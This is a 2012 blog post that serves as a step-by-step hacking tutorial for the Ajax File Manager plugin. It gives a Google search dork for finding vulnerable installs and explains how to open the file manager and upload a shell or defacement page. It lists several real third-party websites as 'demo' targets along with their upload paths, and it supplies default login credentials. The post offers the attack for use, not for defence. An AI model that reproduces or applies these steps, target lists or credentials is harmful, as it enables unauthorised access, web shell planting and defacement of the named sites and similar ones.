Ajax File Manager ~ Shell and Files Upload Vulnerability ~ Ismail Hossain

Wednesday, August 29, 2012

Ajax File Manager ~ Shell and Files Upload Vulnerability

Share this article :

372186_100002061928187_1094618549_n.jpg (180×178)

Open Google Search Engine, Type this dork :inurl:/plugins/ajaxfilemanager/
For Example I got :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
or any site else ...
Now Put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url

for example :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

Now Find Upload Upload and Upload Your shell/Deface/file

To view you File find /Uploaded/ directory in Website by using your brain :P

example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt

Some Demo sites

http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

Results :
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere

if you need Login in any ajaxfilemanager

Default Password Ajax File Manager
Username:ajax
Password:123456

Facebook Comments Plugin by Master cMs>

Do you like this post? Please link back to this article by copying one of the codes below.

URL Of Post:

https://systechict.blogspot.com/2012/08/ajax-file-manager-shell-and-files.html

HTML Link Code:

<a href="https://systechict.blogspot.com/2012/08/ajax-file-manager-shell-and-files.html">Ajax File Manager ~ Shell and Files Upload Vulnerability</a>

BB (forum) link code:

[url=https://systechict.blogspot.com/2012/08/ajax-file-manager-shell-and-files.html]Ajax File Manager ~ Shell and Files Upload Vulnerability[/url]

Ismail Hossain

Wednesday, August 29, 2012

Ajax File Manager ~ Shell and Files Upload Vulnerability

0 comments:

Post a Comment

Menu

Most View

Sponsor